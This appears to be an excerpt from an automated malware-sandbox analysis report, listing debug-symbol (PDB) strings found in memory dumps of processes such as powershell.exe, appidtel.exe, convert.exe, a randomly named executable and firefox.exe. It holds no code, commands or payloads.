Source:	Binary string: wntdll.pdb source: appidtel.exe, appidtel.exe, 0000000A.00000003.2629248061.0000000003729000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000003.2627277075.000000000357A000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 00000013.00000003.2729543157.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2733109530.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.00000000037FE000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.0000000003660000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: appidtel.pdb source: convert.exe, 00000013.00000002.2977602776.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.000000000259C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F20C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: appidtel.exe, 0000000A.00000003.2629248061.0000000003729000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000003.2627277075.000000000357A000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2729543157.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2733109530.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.00000000037FE000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.0000000003660000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: convert.pdb source: appidtel.exe, 0000000A.00000002.2727615136.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536147480.0000000001288000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000003.2670887482.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: convert.pdbGCTL source: appidtel.exe, 0000000A.00000002.2727615136.00000000033A7000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536147480.0000000001288000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000003.2670887482.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mNqSPruzCXM.exe, 00000011.00000000.2643006321.000000000026E000.00000002.00000001.01000000.00000006.sdmp, mNqSPruzCXM.exe, 00000018.00000000.2801120472.000000000026E000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: appidtel.pdbGCTL source: convert.exe, 00000013.00000002.2977602776.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.000000000259C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F20C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
